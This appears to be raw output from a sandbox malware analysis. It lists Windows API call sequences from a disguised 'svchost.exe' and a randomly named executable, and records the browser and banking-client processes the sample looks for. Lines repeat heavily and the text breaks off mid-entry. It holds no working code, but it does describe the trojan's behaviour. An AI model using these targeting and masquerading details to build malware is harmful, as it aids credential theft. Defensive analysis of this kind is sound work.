Source: C:\Windows\apppatch\svchost.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA,CreateMutexA,GetLastError, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|	2_2_02C73510
Source: C:\Windows\apppatch\svchost.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA,CreateMutexA,GetLastError, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|	2_2_02C73510
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe	6_2_01755890
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe	6_2_01755890
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe	6_2_01755890
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe	6_2_01755890
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe	6_2_01755890
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe	6_2_01755890
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|	6_2_01756370
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|	6_2_01756370
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|	6_2_01756370
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|	6_2_01743510
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|	6_2_01743510
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|	6_2_01743510
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|	7_2_03116370
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|	7_2_03116370
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|	7_2_03116370
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe	7_2_03115890
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe	7_2_03115890
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStr